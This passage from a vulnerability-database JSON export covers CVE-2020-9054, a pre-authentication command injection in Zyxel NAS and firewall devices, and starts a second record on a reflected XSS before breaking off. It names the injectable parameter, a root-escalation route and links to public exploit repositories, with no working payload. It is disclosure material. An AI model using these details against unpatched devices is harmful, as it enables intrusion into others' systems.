            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aapl.3\\)c0"
          },
          {
            "model": "zywall310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abhl.3\\)c0"
          },
          {
            "model": "usg40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg1900",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "zywall110",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aaaa.3\\)c0"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abfc.3\\)c0"
          },
          {
            "model": "nas540",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21\\(aatb.4\\)c0"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abfu.3\\)c0"
          },
          {
            "model": "usg20-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abaq.3\\)c0"
          },
          {
            "model": "usg210",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aapi.3\\)c0"
          },
          {
            "model": "usg1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "zywall310",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aaab.3\\)c0"
          },
          {
            "model": "zywall1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(abps.3\\)c0"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": "usg60",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35\\(aaky.3\\)c0"
          },
          {
            "model": "usg60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.35"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas 326",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas 520",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas 540",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas 542",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20w-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas326 \u003cv5.21 c0",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas520 \u003cv5.21 c0",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas540 \u003cv5.21 c0",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nas542 \u003cv5.21 c0",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa210",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa220",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa220+",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa221",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa310",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa310s",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa320",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa320s",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa325",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nsa325v2",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp100_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp500_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp800_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:nas326_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:nas520_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:nas540_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:nas542_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg20-vpn_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg20w-vpn_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          }
        ]
      },
      "cve": "CVE-2020-9054",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-9054",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "availabilityRequirement": "NOT DEFINED",
                "baseScore": 10.0,
                "collateralDamagePotential": "NOT DEFINED",
                "confidentialityImpact": "COMPLETE",
                "confidentialityRequirement": "NOT DEFINED",
                "enviromentalScore": 7.1,
                "exploitability": "FUNCTIONAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-9054",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "integrityRequirement": "NOT DEFINED",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "remediationLevel": "UNAVAILABLE",
                "reportConfidence": "CONFIRMED",
                "severity": "HIGH",
                "targetDistribution": "MEDIUM",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "JPCERT/CC",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-001758",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-15993",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-9054",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "JPCERT/CC",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-001758",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-9054",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
                "id": "CVE-2020-9054",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-9054",
                "trust": 0.8,
                "value": "HIGH"
              },
              {
                "author": "JPCERT/CC",
                "id": "JVNDB-2020-001758",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-15993",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202002-1216",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-9054",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2. plural ZyXEL Included in the product weblogin.cgi Is vulnerable to the execution of arbitrary commands. OS Command injection (CWE-78) - CVE-2020-9054 ZyXEL In multiple products offered by CGI Executable file weblogin.cgi Authentication is done using. About this vulnerability ZyXEL Made NAS Exploit codes for products are available on the Internet. Zyxel Technology is a provider of network broadband systems and solutions for internationally renowned brands. main\r\n\r\nProducts include DSL central office and terminal equipment, router equipment, network security equipment, wireless local area communication equipment,\r\n\r\nIt also provides full-range broadband network application integration solutions for Chinese enterprises, such as network telephones and Ethernet switches. \n\r\n\r\nMultiple ZyXEL network-attached storage (NAS) devices have security holes",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          },
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054"
          }
        ],
        "trust": 2.97
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.kb.cert.org/vuls/id/498544",
            "trust": 0.8,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#498544",
            "trust": 3.3
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054",
            "trust": 3.1
          },
          {
            "db": "JVN",
            "id": "JVNVU97748968",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "id": "VAR-202003-1707",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          }
        ],
        "trust": 1.5236111124999998
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          }
        ]
      },
      "last_update_date": "2025-11-18T15:22:16.168000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel security advisory for the remote code execution vulnerability of NAS products",
            "trust": 0.8,
            "url": "https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml"
          },
          {
            "title": "Patch for Multiple ZyXEL Network Attached Storage (NAS) Device Pre-Verification Command Injection Vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/207745"
          },
          {
            "title": "Multiple ZyXEL Product operating system command injection vulnerability fixes",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=110815"
          },
          {
            "title": "exploit",
            "trust": 0.1,
            "url": "https://github.com/Notionned101/exploit "
          },
          {
            "title": "kenzer-templates",
            "trust": 0.1,
            "url": "https://github.com/Elsfa7-110/kenzer-templates "
          },
          {
            "title": "kenzer-templates",
            "trust": 0.1,
            "url": "https://github.com/ARPSyndicate/kenzer-templates "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/top-microsoft-adobe-exploits-list/166241/"
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/"
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/flaws-zyxels-network-management-software/153554/"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2020/02/26/zyxel_security_hole/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.3,
            "url": "https://www.zyxel.com/support/remote-code-execution-vulnerability-of-nas-products.shtml"
          },
          {
            "trust": 3.3,
            "url": "https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/"
          },
          {
            "trust": 2.6,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 1.7,
            "url": "https://kb.cert.org/vuls/id/498544/"
          },
          {
            "trust": 1.7,
            "url": "https://kb.cert.org/artifacts/cve-2020-9054.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9054"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-9054"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9054"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu97748968"
          },
          {
            "trust": 0.8,
            "url": "https://www.kb.cert.org/vuls/id/498544/"
          },
          {
            "trust": 0.7,
            "url": "https://www.kb.cert.org/vuls/id/498544"
          },
          {
            "trust": 0.6,
            "url": "https://securityaffairs.co/wordpress/98461/hacking/zyxel-critical-rce.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/notionned101/exploit"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-24T00:00:00",
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "date": "2020-03-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "date": "2020-03-04T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "date": "2020-02-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "date": "2020-02-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "date": "2020-03-04T20:15:10.750000",
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-26T00:00:00",
            "db": "CERT/CC",
            "id": "VU#498544"
          },
          {
            "date": "2020-03-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-15993"
          },
          {
            "date": "2020-03-06T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-9054"
          },
          {
            "date": "2023-05-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          },
          {
            "date": "2020-04-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-001758"
          },
          {
            "date": "2025-11-10T14:37:04.570000",
            "db": "NVD",
            "id": "CVE-2020-9054"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZyXEL pre-authentication command injection in weblogin.cgi",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#498544"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202002-1216"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201904-0115

    Vulnerability from variot - Updated: 2024-11-23 23:04

    On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter. plural ZyXEL The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZyXELZyWall310 and other products are all products of ZyXEL Corporation of Taiwan, China. ZyXELZyWall310 is a 310 series VPN firewall device. ZyXELZyWall110 is a 110 series VPN firewall device. The ZyXELUSG1900 is a next-generation unified security gateway device. A cross-site scripting vulnerability exists in several Zyxel products that stems from the lack of proper validation of client data by web applications. An attacker could exploit the vulnerability to execute client code. ZyXEL ZyWall 310, etc. The following products are affected: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, Zy0WALL

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "usg110",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg60w",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg60",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg40w",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg40",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg20w-vpn",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg20-vpn",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "atp800",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "atp500",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "atp200",
            "scope": null,
            "trust": 1.4,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg20w-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "zywall 310",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg1100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "zywall 1100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg2200-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "atp500",
            "scope": "eq",
